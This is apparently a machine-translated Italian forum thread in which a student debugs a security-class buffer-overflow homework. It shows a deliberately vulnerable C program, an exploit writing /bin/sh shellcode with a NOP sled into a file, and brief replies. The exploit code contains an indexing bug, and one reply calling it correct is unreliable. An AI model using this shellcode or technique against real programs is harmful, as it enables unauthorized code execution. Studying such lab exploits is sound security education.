studente questa roba overflow del buffer per una classe di sicurezza, sto cercando di sfruttare la vulnerabilità in questa applicazione:Overflow del buffer come homeowrk
//vuln.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
Utilizzando questo exploit applicazione:
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
int main(int argc, char* argv[])
{
char buffer[517];
char large_string[512];
FILE *badfile;
badfile = fopen("./badfile", "w");
//NOPslide
memset(&buffer,0x90,517);
//BEGIN FILL BUFFER
//from stack_smashing.pdf
long *long_ptr = (long *) large_string;
int i;
for (i = 0; i < 128; i++)
*(long_ptr + i) = (int) buffer;
for (i = 100; i < strlen(code)+100; i++)
large_string[i] = code[i];
strcpy(buffer,large_string);
//END FILL BUFFER
//save buffer to badfile
fwrite(buffer,517,1,badfile);
fclose(badfile);
return 0;
}
Per qualche ragione, quando creo il badfile eseguendo exploit, non vi spinge nulla. O il buffer è vuoto o non sta scrivendo correttamente. Non riesco a trovare il mio errore e, dopo instancabilmente ricerca su Google, non sono riuscito a trovare una risposta sufficiente. Dalla mia comprensione del codice del buffer di riempimento che ho usato, questo dovrebbe riempire long_string con l'indirizzo del mio buffer, quindi inserire il mio shellcode all'inizio di long_string (dopo un po 'di una diapositiva di NOOP) e quindi copiare long_string sul buffer. Non vedo davvero alcun problema con questo o con l'autore. Suggerimenti?
È 'badfile - fopen (" badfile "," r ")' un errore nel codice o il tuo post? – ughoavgfhw
Supponendo 'sizeof (long) == 4' (ovvero programma a 32 bit), il codice dovrebbe funzionare così com'è. –
Supponendo sizeof (long)> 4, il codice ha un buffer overflow stesso. – Sebastian